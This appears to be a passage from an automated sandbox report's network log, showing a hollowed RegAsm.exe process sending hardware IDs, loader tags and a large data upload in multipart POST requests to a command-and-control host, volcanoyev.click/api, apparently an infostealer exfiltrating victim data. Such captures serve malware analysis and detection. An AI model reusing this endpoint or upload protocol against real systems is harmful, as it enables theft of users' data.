                                                          2024-12-24 01:18:35 UTC15331OUTData Raw: e2 e0 68 bc bd 3e 0a 05 22 3d e6 26 33 53 bf 1e 70 f4 3d bd c6 29 0d 5b 4d 02 4d 8b 37 c5 06 da 5f c2 46 40 1b 81 18 96 c1 51 f4 ed ef a8 74 de 58 d8 af a6 f4 44 21 1f 98 c1 41 65 54 3b 8a fd 38 1b ef 77 cd bc fe e2 b6 ff c9 0b c1 e7 af b4 d9 ab 69 2d be af 9a 85 2e d9 9d c5 1a a5 1b 14 9e 2b 15 7e 30 55 b6 6a f0 56 d3 d6 56 9c 25 ab b9 8f a9 94 ee 7a ed 94 76 9b 94 c3 79 29 3e 53 52 60 d0 72 5b 62 8c c3 87 3d d1 74 9f e5 5d e1 41 ef 16 b6 20 ec 55 76 8c 16 cd 58 f4 7e 6d d1 d2 ab 74 f3 63 43 83 e8 d6 69 39 c4 b9 48 ea 2a ef c0 8a 14 65 1c 47 4b 35 2e da 2c ce dd 28 f8 16 90 42 d1 e7 dc 7f d1 ec 91 2f f7 fc 7d ca d6 6d 76 ce e8 87 72 51 ae d7 ed 72 9b 3a 69 eb b3 36 66 ef e9 37 4b e7 6f 37 bf 7b f5 36 74 fa 51 4e fb 4a 88 e0 22 b3 2d 6b bf 65 ae 94 42 c5
                                                          Data Ascii: h>"=&3Sp=)[MM7_F@QtXD!AeT;8wi-.+~0UjVV%zvy)>SR`r[b=t]A UvX~mtcCi9H*eGK5.,(B/}mvrQr:i6f7Ko7{6tQNJ"-keB
                                                          2024-12-24 01:18:37 UTC1131INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:37 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=6ulu2itv0q9vhg9u0ofj8ufh8j; expires=Fri, 18 Apr 2025 19:05:16 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YOLovBlghpK6VOHp5t%2FetXhHPzeF9tOaGcLM1ft0fr6mMj4H0NN0xarJxWEqHDYxeaO7Vld3eq%2FEjNq8qoPyveeGimA7jmne4amGUjxnSTp3TH%2F9Jdj83%2BFHFzA4B758fCeZ"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc21feff64363-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2153&min_rtt=2152&rtt_var=810&sent=208&recv=612&lost=0&retrans=0&sent_bytes=2838&recv_bytes=591722&delivery_rate=1348729&cwnd=237&unsent_bytes=0&cid=ec6cf699b4fa7abf&ts=2391&x=0"


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.849725172.67.195.2414434352C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-24 01:18:35 UTC282OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=2DGZLGRS1W8I0K7T2Q
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 15077
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:35 UTC15077OUTData Raw: 2d 2d 32 44 47 5a 4c 47 52 53 31 57 38 49 30 4b 37 54 32 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 31 38 34 45 42 43 44 36 37 39 44 44 38 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 32 44 47 5a 4c 47 52 53 31 57 38 49 30 4b 37 54 32 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 44 47 5a 4c 47 52 53 31 57 38 49 30 4b 37 54 32 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 4c 6f 61 64 65
                                                          Data Ascii: --2DGZLGRS1W8I0K7T2QContent-Disposition: form-data; name="hwid"AD184EBCD679DD86AC8923850305D13E--2DGZLGRS1W8I0K7T2QContent-Disposition: form-data; name="pid"2--2DGZLGRS1W8I0K7T2QContent-Disposition: form-data; name="lid"VC6Dfm--Loade
                                                          2024-12-24 01:18:36 UTC1129INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:36 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=gk9gqligd5p3jbihv9f2v3g56o; expires=Fri, 18 Apr 2025 19:05:14 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fQY6XDLGG%2BXUD17Hyssec%2BfBgoiO%2BKHUGvKvfp5mZBrHbEKBQecYY7d%2Bv85%2BhfKnDaTgZcirQ3tsOinqWnFj4SYt7ihz2J3ry4cbIyl3Mvav9rgjOYTnvKhEoe9HNCgeAzOd"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc21ffe3319b6-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1803&min_rtt=1799&rtt_var=684&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2839&recv_bytes=16017&delivery_rate=1590413&cwnd=170&unsent_bytes=0&cid=388e2462e7f3e304&ts=834&x=0"
                                                          2024-12-24 01:18:36 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                          Data Ascii: fok 8.46.123.189
                                                          2024-12-24 01:18:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.849726172.67.195.2414434352C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-24 01:18:37 UTC273OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=NYG34FC09
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 20190
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:37 UTC15331OUTData Raw: 2d 2d 4e 59 47 33 34 46 43 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 31 38 34 45 42 43 44 36 37 39 44 44 38 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4e 59 47 33 34 46 43 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4e 59 47 33 34 46 43 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 4c 6f 61 64 65 72 32 0d 0a 2d 2d 4e 59 47 33 34 46 43 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                          Data Ascii: --NYG34FC09Content-Disposition: form-data; name="hwid"AD184EBCD679DD86AC8923850305D13E--NYG34FC09Content-Disposition: form-data; name="pid"3--NYG34FC09Content-Disposition: form-data; name="lid"VC6Dfm--Loader2--NYG34FC09Content-Di
                                                          2024-12-24 01:18:37 UTC4859OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 e7 86 a3 c3 52 df 0f 03 00
                                                          Data Ascii: >7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0R
                                                          2024-12-24 01:18:38 UTC1123INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:38 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=jsq1fj5kja5j0tlj4vatuj3lk2; expires=Fri, 18 Apr 2025 19:05:17 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VmFrz7l3FI6aeDZ1DPMuoIJDSKRe%2BI51acnSy8oT1kIt3hjDMHM8ALQzQwClaCRhL1O9vJuFZKpD2w7oYp05Ri1U45s2tGYoY0fwD4DcGTJMpnisTGReFFDBPS80z%2FkDE8IJ"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc22d1fdf0f9f-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1671&min_rtt=1656&rtt_var=652&sent=16&recv=27&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21143&delivery_rate=1640449&cwnd=213&unsent_bytes=0&cid=e5a9d65905202ce8&ts=978&x=0"
                                                          2024-12-24 01:18:38 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                          Data Ascii: fok 8.46.123.189
                                                          2024-12-24 01:18:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.849727172.67.195.2414434132C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-24 01:18:38 UTC264OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 84
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:38 UTC84OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 56 43 36 44 66 6d 2d 2d 4c 6f 61 64 65 72 32 26 6a 3d 26 68 77 69 64 3d 41 44 31 38 34 45 42 43 44 36 37 39 44 44 38 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                          Data Ascii: act=get_message&ver=4.0&lid=VC6Dfm--Loader2&j=&hwid=AD184EBCD679DD86AC8923850305D13E
                                                          2024-12-24 01:18:39 UTC1121INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:39 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=v1v1evca1pt0710o6bhuuuhhbq; expires=Fri, 18 Apr 2025 19:05:18 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WKIb86fU614mEBzT1qUhsMi6mWcnXMC9j4iBZvHOLnSS27x2q2gZoOZu0O4sJrmzaPZS8IPmLEtnaoG1lW4Cy%2B3RalGZ6njk7AUxGmdnr3XajY8wYJxnAvqtAH%2B2jk0%2BMDwT"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc2371fec4295-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1742&min_rtt=1705&rtt_var=714&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=984&delivery_rate=1456359&cwnd=252&unsent_bytes=0&cid=1a6104c6b01512f2&ts=785&x=0"
                                                          2024-12-24 01:18:39 UTC54INData Raw: 33 30 0d 0a 71 71 77 58 74 45 38 79 43 4b 53 68 5a 57 52 4d 77 77 30 78 59 50 53 2f 50 2b 6c 55 66 36 30 73 50 4b 34 7a 31 54 50 6e 47 7a 6a 78 38 51 3d 3d 0d 0a
                                                          Data Ascii: 30qqwXtE8yCKShZWRMww0xYPS/P+lUf60sPK4z1TPnGzjx8Q==
                                                          2024-12-24 01:18:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.849728172.67.195.2414434352C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-24 01:18:39 UTC275OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=K8JYRBZ00Y8F
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 1211
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:39 UTC1211OUTData Raw: 2d 2d 4b 38 4a 59 52 42 5a 30 30 59 38 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 31 38 34 45 42 43 44 36 37 39 44 44 38 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4b 38 4a 59 52 42 5a 30 30 59 38 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 38 4a 59 52 42 5a 30 30 59 38 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 4c 6f 61 64 65 72 32 0d 0a 2d 2d 4b 38 4a 59 52 42 5a 30 30 59 38 46
                                                          Data Ascii: --K8JYRBZ00Y8FContent-Disposition: form-data; name="hwid"AD184EBCD679DD86AC8923850305D13E--K8JYRBZ00Y8FContent-Disposition: form-data; name="pid"1--K8JYRBZ00Y8FContent-Disposition: form-data; name="lid"VC6Dfm--Loader2--K8JYRBZ00Y8F
                                                          2024-12-24 01:18:40 UTC1124INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:40 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=j0dagrthg29eehbunij6q3lboh; expires=Fri, 18 Apr 2025 19:05:19 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AsAXNV0ISixnNVkAZ76PQLC0ZjJWe%2BMG1fMmwTz5s4ggLtis8tUksPkVd8MiWkkM%2FBzXl5gE4oGqL%2BDaw6Z9QliH3bx8JwwsfsqqH1vdejEil63Rhve10aZfG6R%2BkmGmz8px"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc23b68d00f87-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1446&min_rtt=1443&rtt_var=547&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2122&delivery_rate=1990456&cwnd=229&unsent_bytes=0&cid=6ca6170b8c662f5b&ts=773&x=0"
                                                          2024-12-24 01:18:40 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                          Data Ascii: fok 8.46.123.189
                                                          2024-12-24 01:18:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.849729172.67.195.2414434352C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-24 01:18:42 UTC282OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=6JZILERQMQWI51E14
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 589118
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:42 UTC15331OUTData Raw: 2d 2d 36 4a 5a 49 4c 45 52 51 4d 51 57 49 35 31 45 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 31 38 34 45 42 43 44 36 37 39 44 44 38 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 36 4a 5a 49 4c 45 52 51 4d 51 57 49 35 31 45 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 4a 5a 49 4c 45 52 51 4d 51 57 49 35 31 45 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 4c 6f 61 64 65 72 32 0d
                                                          Data Ascii: --6JZILERQMQWI51E14Content-Disposition: form-data; name="hwid"AD184EBCD679DD86AC8923850305D13E--6JZILERQMQWI51E14Content-Disposition: form-data; name="pid"1--6JZILERQMQWI51E14Content-Disposition: form-data; name="lid"VC6Dfm--Loader2
                                                          2024-12-24 01:18:42 UTC15331OUTData Raw: ce 43 e8 a8 73 8d 46 a0 ad 4d 39 83 aa 35 25 e9 54 76 30 0d a8 28 f2 08 8a c9 4d 2f 2f 49 b7 22 a9 9e b5 88 60 ef 4e 2f 36 3e 7c a8 88 72 7f ef ee db 17 49 97 6b 4f d0 92 61 fe 62 81 2e a5 7f bd 5f 9c a5 98 06 aa ff f6 50 68 18 72 3e b6 d8 39 e2 fa 34 da 37 d1 9d 1e be ae 5d d2 c1 5a 8c 07 ba 19 a3 b9 cb 1c 02 0e 5a 21 a0 5c 05 29 51 26 fa ee 43 8f 3c f4 5a 4a bb 6b cd f0 99 28 b2 7d 57 ce 92 03 8a 3c 8f ea 8e 57 a6 39 8a f6 25 69 f1 b8 16 9a 8c 58 14 c7 b3 be 4e 8f 8b 7b e4 28 69 c5 06 c0 be 3e a8 c6 0d b3 6c bc ea 40 7e 6a aa 1a 67 e5 c2 70 38 e6 2e f7 ae 9e d3 69 7e 28 ee fe 79 73 77 d4 ad a4 56 49 74 2f 41 65 28 12 a9 ca 5c 83 55 37 0b 40 f2 ff be f0 80 f1 cd 4c 4c 9d 6f 27 6f 17 23 cb 30 08 ca ae e4 0c 0d dc 65 34 55 64 1e c4 c0 8b b5 a5 3d b5 d4 05
                                                          Data Ascii: CsFM95%Tv0(M//I"`N/6>|rIkOab._Phr>947]ZZ!\)Q&C<ZJk(}W<W9%iXN{(i>l@~jgp8.i~(yswVIt/Ae(\U7@LLo'o#0e4Ud=
                                                          2024-12-24 01:18:42 UTC15331OUTData Raw: 23 ce 55 0b 52 65 09 34 aa 4a 47 79 72 5f d4 a4 14 60 b5 8e 87 8c dd 38 35 0d a1 c0 51 46 7e 11 06 ce 91 6e 36 d1 4b 62 7f 1b 6b 4d 53 6e c8 52 5a 26 f1 be 90 42 72 aa ea f5 20 3e 6f fd 07 c6 fa f3 28 44 2b fb 5c cf 90 35 b6 e7 16 ea 9f 69 29 1b c9 8f d3 30 d1 aa c0 7c 1d 6f 96 13 80 b1 c3 e7 78 61 7b ab a8 92 bf 90 fe 7a c6 50 d6 fd a5 ec eb 65 a4 84 2e cb 0d 45 70 ff d9 3c 52 ba 01 66 01 e4 7b aa 55 0e 42 12 a0 79 dc fb 25 27 dd 0f 9d c6 c7 35 88 83 79 c5 d5 f8 1e 11 c2 57 41 71 bb 78 9e a9 d5 49 52 3a 20 63 63 11 7d 5e 43 1a 59 c0 f6 f5 fb 84 c5 bd a7 ba 59 ed c3 e8 ae 3b e2 de dc db f4 6d 57 88 90 2c 02 1e 06 86 1f b3 c1 34 ba 51 60 a3 78 7e a3 da c2 0e c3 46 7d 25 cc 98 ce 09 ad 78 7d 85 db cb a3 93 c9 ba 23 81 0f 06 03 cf df fd 73 69 d7 96 7b 46 2b
                                                          Data Ascii: #URe4JGyr_`85QF~n6KbkMSnRZ&Br >o(D+\5i)0|oxa{zPe.Ep<Rf{UBy%'5yWAqxIR: cc}^CYY;mW,4Q`x~F}%x}#si{F+
                                                          2024-12-24 01:18:42 UTC15331OUTData Raw: 6d 84 b4 ee 28 ab 89 57 55 35 82 a4 89 26 ae b7 bb 7a af b8 5a a7 3d ca cc 5b f5 9a 1a 18 3e 5f fa 0c ae a2 9b 07 66 8d 93 39 c6 de 02 c9 23 b6 d5 0b a7 62 d8 fb 77 42 c3 f6 70 55 61 21 2e 0a 8a 19 8f 74 81 4b 3b 1c b0 93 2f 78 7d 8f 66 7e 21 35 fe d6 06 44 18 db 5d 12 bc c1 4c 0e 06 1c 48 38 a1 fb 47 e8 9f d1 35 df 09 10 c7 71 7a e5 0b 44 01 5c f7 fd 09 45 18 18 f9 6c 0a 88 bd 3e a6 a7 83 be c0 c8 b1 67 26 02 d6 96 b2 82 4b f7 8f fe 13 52 0c ec cf 4f 17 0f 66 1d c9 52 e8 d6 00 c7 1f 36 af 04 94 ad ca 67 95 1d 21 0e d4 ce 2c 4d 7c d1 07 58 4a 3d f7 05 4f b3 6b 8d f9 18 ab 71 a9 f1 77 59 7b 4a c3 8b 7c cb eb 10 28 a5 95 c8 9f e6 64 a2 a9 63 a3 a1 ef 55 12 4e 37 37 91 18 5d c1 1f 61 c4 da 00 a7 c4 15 87 36 45 76 2c 8c 3a 82 0c 0f 85 26 08 16 42 b5 ee 66 d4
                                                          Data Ascii: m(WU5&zZ=[>_f9#bwBpUa!.tK;/x}f~!5D]LH8G5qzD\El>g&KROfR6g!,M|XJ=OkqwY{J|(dcUN77]a6Ev,:&Bf
                                                          2024-12-24 01:18:42 UTC15331OUTData Raw: 97 81 39 b0 c0 b9 4d 54 1c 42 45 16 e3 8e 87 2b ba 34 df 8f 5f a2 b6 e3 0c 2f 80 ef 4b 59 84 8e ba e3 f4 4b ad e1 81 76 68 cc db 2f fd b6 c3 24 7f e3 8c 36 de 54 59 d0 a7 74 34 f5 14 d0 28 cd 52 00 05 99 2f 42 23 51 2f d3 72 58 4c af aa 6c dc db 37 10 56 86 1d 5c e2 a9 9c 88 74 9b 6f 6b e6 ef dd b8 11 3c e1 ba 4b b2 ef 98 41 81 d9 01 dc 6b 05 02 ee 1d b6 c3 44 17 01 60 2d db bc c0 ec 8f 42 24 9c 9c 46 ad f5 04 b4 0b 88 88 1b 19 5e 7d 2b 34 2b 40 b4 4d 2a b0 06 05 f6 ae 44 a5 8c ab 64 aa 21 ae 4f 05 e4 1e 91 29 d8 05 ec 4e a4 11 4c e1 54 13 32 21 bb 17 e3 55 f3 83 b0 da 1d a7 48 14 17 e4 e3 bb 84 22 0f 47 50 9d a6 b8 26 3f c9 d2 e2 b5 c4 7d a1 65 06 18 5d ff 5b 6f 8e 60 ed b8 75 fc 26 97 41 4a 96 c9 4f f0 16 83 e0 05 7e 3c c4 67 41 64 3e 36 40 a8 61 d7 cf
                                                          Data Ascii: 9MTBE+4_/KYKvh/$6TYt4(R/B#Q/rXLl7V\tok<KAkD`-B$F^}+4+@M*Dd!O)NLT2!UH"GP&?}e][o`u&AJO~<gAd>6@a
                                                          2024-12-24 01:18:42 UTC15331OUTData Raw: ce bb 49 45 e8 3a b7 d4 1a 7a e1 56 4f d1 50 04 5f f9 3c 93 d8 18 2d 13 cf 13 a6 d3 29 35 27 f7 fb 4e f6 2a 16 bf 2a 12 9c f2 41 73 8d 71 7d 2b 09 e0 ed 8d f7 dd a7 95 bb 5b 4e 05 a7 00 90 20 2b 33 76 71 36 ad 18 df 17 94 ed 6a 35 c6 73 48 ab c9 2f 80 a5 c4 27 f3 70 5f 81 16 e7 a6 4e 32 ca c0 0b 94 6e 37 ba ce 9e 3b c3 6c 58 3b 68 e7 79 d7 18 bf 39 fe be e8 43 75 27 e4 8e 68 1e f4 f0 56 74 7b e2 7d 32 9d 84 9f cf 5f 1d ae a8 74 6d 35 39 16 4e 1d f7 5b d9 fc fb f8 c1 b8 0a d9 0c 0e b8 cf 60 a6 d7 a7 af 67 56 d8 69 80 a5 47 bc 20 7f b0 5b 5b 7d ad 96 bf 4b 77 7e ad f9 95 a0 79 e8 60 cf 64 33 35 60 f3 37 1b 4d cf 1f d4 c4 42 8c c4 8b cc 20 f3 ed bd 85 f7 f2 87 36 2a c6 a3 b5 a9 c2 55 6b cc e4 54 5e 02 98 af 32 57 8b 1f 1c f2 7f 80 83 9b b1 cc 5d 80 21 fe d2
